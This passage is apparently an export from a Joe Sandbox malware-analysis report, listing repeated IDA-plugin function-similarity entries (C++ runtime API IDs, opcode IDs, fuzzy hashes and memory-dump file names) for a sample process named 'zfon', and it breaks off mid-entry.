                                                                                                • Opcode ID: 583335841ff9602645cb6664fed9de2ebde08a5211e8c3e23cc0461a38c1d219
                                                                                                • Instruction ID: 626f34812d26e2348da753b210781dfae9d9f6987ad6d9e1de8f8e6252b73233
                                                                                                • Opcode Fuzzy Hash: 583335841ff9602645cb6664fed9de2ebde08a5211e8c3e23cc0461a38c1d219
                                                                                                • Instruction Fuzzy Hash: 2231A334218E0E8FEB58EB5DD8A87A777E2FBA5310F60051AE50AC3192DA70EC05C742
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: e2495dd69d5672fc0aaaa369d26148b0abf04ff890b9c1c781e0b3a4c03f4bb5
                                                                                                • Instruction ID: 85e344adef72dddba5352a0e64997aba63ca35d56f5900b8146923c820add8e6
                                                                                                • Opcode Fuzzy Hash: e2495dd69d5672fc0aaaa369d26148b0abf04ff890b9c1c781e0b3a4c03f4bb5
                                                                                                • Instruction Fuzzy Hash: B2318334218E0E8FEB55EF5CD8A8B6777D2FBA5310F61056AD01AC3192CA70EC06C782
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: 5b51ba569134c5825c2a12444e071813949180b5e2251155b7274c78dbf33661
                                                                                                • Instruction ID: 10d1c701d28c27d7416cecb846411849497688c1d86d628d7f08b4c3ebd37fc2
                                                                                                • Opcode Fuzzy Hash: 5b51ba569134c5825c2a12444e071813949180b5e2251155b7274c78dbf33661
                                                                                                • Instruction Fuzzy Hash: 6D31C734109E0D8FE755EF98D9997A773D2FB98321F20056AD016C7192DA71DD42C742
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: 0ffcfb448721cd06397d466f10d1976de46c092da8247e5d3e388cbc18f79200
                                                                                                • Instruction ID: 5669a15bbdfb55a284817c42e35d5c150f2c43905f5d7293ae162a2e33ff77b6
                                                                                                • Opcode Fuzzy Hash: 0ffcfb448721cd06397d466f10d1976de46c092da8247e5d3e388cbc18f79200
                                                                                                • Instruction Fuzzy Hash: E1316335618A0E8FEB55EF98D4A876773D2FBA9310F20056BD01AC3192DA74EC05C782
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: 307936bf862e9c56774054b0fe3b54df52b4457b7974b0711e644fe09a43965e
                                                                                                • Instruction ID: 382c98206510afb2ac7aa39588c60cd0421648375a14ea94c5f45977ef562702
                                                                                                • Opcode Fuzzy Hash: 307936bf862e9c56774054b0fe3b54df52b4457b7974b0711e644fe09a43965e
                                                                                                • Instruction Fuzzy Hash: 3131A535208E1A8FE755EF5CD4A8B6773D2FBA9310F60051AD04AC3296CA74EC06CB42
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: 4bf21808c0c1e7a09acacbbea9166ac19d61edc7bab033586c1f8b75ca445260
                                                                                                • Instruction ID: c4dd51a079aa79cf4b6786cf060c2cf1dbb421f5b534e626c700148da7a6af72
                                                                                                • Opcode Fuzzy Hash: 4bf21808c0c1e7a09acacbbea9166ac19d61edc7bab033586c1f8b75ca445260
                                                                                                • Instruction Fuzzy Hash: 88319434114E1E8FEB59EF5CD8A9BA773E2FBA9310F61055AD15AC3192CA70EC41C742
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: 862992bce964ab0c63e7cab57c339ac449796c3ca8f564e14f2f8dfb22915006
                                                                                                • Instruction ID: 6ae7ae86934f30da86dab21ab4f1539a4f77c56a8cfbda18c7a652b7a5354c6a
                                                                                                • Opcode Fuzzy Hash: 862992bce964ab0c63e7cab57c339ac449796c3ca8f564e14f2f8dfb22915006
                                                                                                • Instruction Fuzzy Hash: 9B319435518E0E8FEB95EF5CD4A8B6773D2FBA9310F60055AE00AC7192CA70EC06C782
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: 00cb2e2044b4871cd409dcbc662768aff73f691382f39fd1240f727da866cb6b
                                                                                                • Instruction ID: 100a1da0b0c5ba6fe09ab2f4055ac7c8a079bf96300290dd5eeac4de84456a06
                                                                                                • Opcode Fuzzy Hash: 00cb2e2044b4871cd409dcbc662768aff73f691382f39fd1240f727da866cb6b
                                                                                                • Instruction Fuzzy Hash: A3317234615A1E8FEB55EB58D8A876B73D2FBE9310F20056BE01AC3192DA70EC45C782
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: 5ba236c1302e0f4c08eb61ded93d5648ba8ee788d7da3f853cda1361367814b3
                                                                                                • Instruction ID: 80c6416ebc8f0b8a5fd1c6dcf0751e113b1c4b1004f3489a9cb4229d144af118
                                                                                                • Opcode Fuzzy Hash: 5ba236c1302e0f4c08eb61ded93d5648ba8ee788d7da3f853cda1361367814b3
                                                                                                • Instruction Fuzzy Hash: 05318434114E1E8FF755EB5CD8A8BAB73D2FBA9310F60051AE006C3192CA70DC06C742
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: 6535183f03e00e2b75dfe095d60873b9b336e1563bed7380b75a38ab6af5389c
                                                                                                • Instruction ID: 9c6e6b9ed90b5229781c3238d30ed78170976184b7dfab6346d7bad653f505a7
                                                                                                • Opcode Fuzzy Hash: 6535183f03e00e2b75dfe095d60873b9b336e1563bed7380b75a38ab6af5389c
                                                                                                • Instruction Fuzzy Hash: 03318534618E1E8FE795EB5CD498B6773E2FBA9310F60056AD10BC3196DA74EC41C742
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: 0089ee0f90cfcfc3905d376521154184871410e51c2b35d0fd0cc8a09faef5a7
                                                                                                • Instruction ID: ad76a2a5bcf56d2607ad1ade89551540be6edab6d10efca0a82849371ec797e0
                                                                                                • Opcode Fuzzy Hash: 0089ee0f90cfcfc3905d376521154184871410e51c2b35d0fd0cc8a09faef5a7
                                                                                                • Instruction Fuzzy Hash: 7831A635514E1E8FEB95EF58D8A8B6773D2FBA9310F60056BE00AC3192CA74ED45C742
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: c8df43411027ee0eacf25160c64c1c6837d1a75b5692cc2013478a6db91940d2
                                                                                                • Instruction ID: e8cb9c42f6253cd670aa8bf338d20c4288a5dfa1103759b0fddda308c30e99d4
                                                                                                • Opcode Fuzzy Hash: c8df43411027ee0eacf25160c64c1c6837d1a75b5692cc2013478a6db91940d2
                                                                                                • Instruction Fuzzy Hash: 2B318635618A1D8FE759EF58D8A876773D2FBA9310F20056BD04AC3296DA74EC05C783
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: 1a93674ec69a5735ffc695062ee79727fc64cbeb286943dc879ab4140d30de10
                                                                                                • Instruction ID: 9cd53af7ab92f25c0d119a91f0d2dee9f9e98093d101ae3df025a4da3d793bad
                                                                                                • Opcode Fuzzy Hash: 1a93674ec69a5735ffc695062ee79727fc64cbeb286943dc879ab4140d30de10
                                                                                                • Instruction Fuzzy Hash: FB31A774208E0E8FF758EB5CD8A8B6773E2F7A5310F60051AE01AC3192DA70EC01C742
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: c7ba1efc560f9f7a799841fb3f637d69f22de253fd67b94bfea447ecd5ef99a2
                                                                                                • Instruction ID: a2a1f26e3953cfdbbc5c1a7265948dd7cca0581d1d3b9f6c9ca4f027be98794f
                                                                                                • Opcode Fuzzy Hash: c7ba1efc560f9f7a799841fb3f637d69f22de253fd67b94bfea447ecd5ef99a2
                                                                                                • Instruction Fuzzy Hash: 70318534114E1E8FEB55EB9CD8A8BA773E2FBA5310F61056AD01AC3192DA70EC06C742
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: 01aba30f30b8db2cc18e541b81b84b10a987afc259ab90795f57b8b72824d431
                                                                                                • Instruction ID: 99d202c2e54d22ca6eff98f22ba839d5ca850ffc2fc8dc4a66497916caa2bb50
                                                                                                • Opcode Fuzzy Hash: 01aba30f30b8db2cc18e541b81b84b10a987afc259ab90795f57b8b72824d431
                                                                                                • Instruction Fuzzy Hash: DB318535118E0E8FEB55EB98D4A876A73D2FBA9310F60056BE45AC7196DA70EC01C742
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: b1aa785ebf1be1dd13bba7e54e87b7b3feaa6856ec30afba21a04f671a13dfa8
                                                                                                • Instruction ID: 08b6bf01468d0b7823d43da284a62af5aaa89e347b5d75c5aab1b191e28665c5
                                                                                                • Opcode Fuzzy Hash: b1aa785ebf1be1dd13bba7e54e87b7b3feaa6856ec30afba21a04f671a13dfa8
                                                                                                • Instruction Fuzzy Hash: 9A315234218E0E8FE755EB5CD8A8B6B73D2FBA9310F61055AD40AC3292CA71EC06C752
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: 5e9559544ae838697aff2003c89a20d3b26c38e6557d22376aca609cf3fce5c7
                                                                                                • Instruction ID: 8721b1090adf76f1f0ff08b4b7664cf2e41f13b19d905a23b09bfe8c3c679c63
                                                                                                • Opcode Fuzzy Hash: 5e9559544ae838697aff2003c89a20d3b26c38e6557d22376aca609cf3fce5c7
                                                                                                • Instruction Fuzzy Hash: D3317234618A0D8FE795EF58D8A876773D2FBE9310F60056BE04AC3196DA70EC05C782
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: 5db84670c3be3fb5094032f7cc3172bc4b7ba1af00b02190cd9d95f796dbd767
                                                                                                • Instruction ID: 4812570b70db5fed39cccdf1b56cfb08bd3b37aca005660bfe8209ca7d5e78e2
                                                                                                • Opcode Fuzzy Hash: 5db84670c3be3fb5094032f7cc3172bc4b7ba1af00b02190cd9d95f796dbd767
                                                                                                • Instruction Fuzzy Hash: 0C319335204E0E8FFB54EB5CD8A8B67B7E2FBA9310F60051AD00AC3192DA70EC02C752
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: c6f73dd326dc1c081d63b1c68f07dc92fbedf7debfbab933f23a8b943fe6931e
                                                                                                • Instruction ID: 2e64eef39c85316d898fb77216767137151ac90fd23284bc951410e13f014b85
                                                                                                • Opcode Fuzzy Hash: c6f73dd326dc1c081d63b1c68f07dc92fbedf7debfbab933f23a8b943fe6931e
                                                                                                • Instruction Fuzzy Hash: 65317235214E0E8FEB55EF58D8A8B6773D2FBA9310F60056BE40AC7192DA70EC45C742
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: 50e2e1a74a0cf5e6311173a02a8286c3d737a3608833a0796616b14560155919
                                                                                                • Instruction ID: c01e20b047121d32d8f1a8e4bd032b77bf48f182692be2923d15ca5fe40fc75d
                                                                                                • Opcode Fuzzy Hash: 50e2e1a74a0cf5e6311173a02a8286c3d737a3608833a0796616b14560155919
                                                                                                • Instruction Fuzzy Hash: 20318734118A5E8FE795EF98D5A87A673E2FBA5360F20055ED10AC3196DA70EC05C782
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: 661136fd98006e19691f6f5f900acc5de80e147c60418febdf896cbc6aeb5b24
                                                                                                • Instruction ID: db33dea423ac2d3931d2c9edc5e7c03c273d7939a3c3dd0316dd95819cd9839d
                                                                                                • Opcode Fuzzy Hash: 661136fd98006e19691f6f5f900acc5de80e147c60418febdf896cbc6aeb5b24
                                                                                                • Instruction Fuzzy Hash: 19315235114E1A8FE755EB5CD4A876B73E2FBA9320F60056AE05AC3192DB70EC45C742
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: 83453f4eb3bf1dffc0219fa45b3e84c53879ec1447a878ff3e7c635ee0b3b3df
                                                                                                • Instruction ID: 97623dad366547572b7c128f6e599918962329b2d75dbec8594bd43be6fe1c95
                                                                                                • Opcode Fuzzy Hash: 83453f4eb3bf1dffc0219fa45b3e84c53879ec1447a878ff3e7c635ee0b3b3df
                                                                                                • Instruction Fuzzy Hash: 7D316534114E0E8FEB55EF5CD4A8B6777D2FBA5310F61055AE05AC7192DA70EC06C742
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: dbf76419f223492eb4d567d1ddfead33f015857671d4f618bff8f034f41251d9
                                                                                                • Instruction ID: 57c8a16a8753041b4af4e481d9e9e84e139536c4dba7860a0ccef6dad3e40696
                                                                                                • Opcode Fuzzy Hash: dbf76419f223492eb4d567d1ddfead33f015857671d4f618bff8f034f41251d9
                                                                                                • Instruction Fuzzy Hash: 5F318135614E0E8FE795EB58D4ACB6773D2FBA9310F21056BE50AC71A2DA70EC01C782
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: fc80a38f84d8b1e51c9f1ab55edaf59f604e24cdd39e5698dc947f378b48ed39
                                                                                                • Instruction ID: eccec134b01c5a60afad83a93df72a4b9e58b6e435cfc80e3596912e16f4b96a
                                                                                                • Opcode Fuzzy Hash: fc80a38f84d8b1e51c9f1ab55edaf59f604e24cdd39e5698dc947f378b48ed39
                                                                                                • Instruction Fuzzy Hash: 8F319339118E1E8FEB54EF5CD4A8B6673D2FBA9310F60055AE00AC31A2DA74EC02C746
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: 724891deb70f6bab97fdbecb20f7882af71e6b5afc024078879898faf6915d7b
                                                                                                • Instruction ID: 06bbcdd7d05e757c2c2664d7564a3a44a7a99e06e62acb77f0175fa2a31d5b9e
                                                                                                • Opcode Fuzzy Hash: 724891deb70f6bab97fdbecb20f7882af71e6b5afc024078879898faf6915d7b
                                                                                                • Instruction Fuzzy Hash: 0031B235608E0E8FEF59EF58D4A87A673D2FBA9310F60051BE41AC3192DA74EC05C742
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: 3501a55cac674ec943a4107704978858b696d4dcc1e684f7dc7953510d33aca6
                                                                                                • Instruction ID: 322e054f45ab4e982d6ff274070ff84d276622ea71eedcbde6d0d73bdacb0c27
                                                                                                • Opcode Fuzzy Hash: 3501a55cac674ec943a4107704978858b696d4dcc1e684f7dc7953510d33aca6
                                                                                                • Instruction Fuzzy Hash: F2319434218E1E8FE755EF9CD4A9B6773E2FBA9310F60055AE44AC3196DA70EC05C742
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: 007529ccd9f2093f6cbd3ea33164f1a428c34247ba089f6e8a7b46865526f79e
                                                                                                • Instruction ID: 7ab7df764c0aa73e0b7ed4248dba8339da3c062bb824ef37ed3c504fbb97d6d5
                                                                                                • Opcode Fuzzy Hash: 007529ccd9f2093f6cbd3ea33164f1a428c34247ba089f6e8a7b46865526f79e
                                                                                                • Instruction Fuzzy Hash: F0316534218E1A8FF755EF9CD898B67B7D2FBA5310F61056AD40AC3196DA70EC06C742
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: 25ec4776e4338027b196f5614ee73a8b8353bbf72d8fa38d4934d826f919c06f
                                                                                                • Instruction ID: 3a3d679d0c24edc9e181e0beaa8efcfb50ea9de384a9ef4e4c8eac9928baf75e
                                                                                                • Opcode Fuzzy Hash: 25ec4776e4338027b196f5614ee73a8b8353bbf72d8fa38d4934d826f919c06f
                                                                                                • Instruction Fuzzy Hash: 04318334618A1E8FEB55EF98D4A876777E2FBA9314F20055BE04AC3192DA74EC05C782
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: __std_exception_copy$_invalid_parameter_noinfo_noreturn
                                                                                                • String ID: "$/
                                                                                                • API String ID: 946306463-2662438755
                                                                                                • Opcode ID: f7ed9c186e3a81dd1a682e2aebc4cc29138fbac1561feb00ddfc614076276cc6
                                                                                                • Instruction ID: 6122ad2b9fe826f857546c12370808f2e5dbc5ae5a3b1b88b44732c35b39aee1
                                                                                                • Opcode Fuzzy Hash: f7ed9c186e3a81dd1a682e2aebc4cc29138fbac1561feb00ddfc614076276cc6
                                                                                                • Instruction Fuzzy Hash: 6341E270528E4D8FE745EF28C498BA6B7E1FBA9304F90465BF449C7262EB7598C4C702
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: __std_exception_copy$_invalid_parameter_noinfo_noreturn
                                                                                                • String ID: ($/
                                                                                                • API String ID: 946306463-2468745909
                                                                                                • Opcode ID: fc8a794ece072c0eb655f61c286cb035e8ef0a971ebfcc12b5a3971e85337c2d
                                                                                                • Instruction ID: 64f460a91740d607ee8c02d7e7b307fbc0c1a5eace0abc04f503d961aa465af5
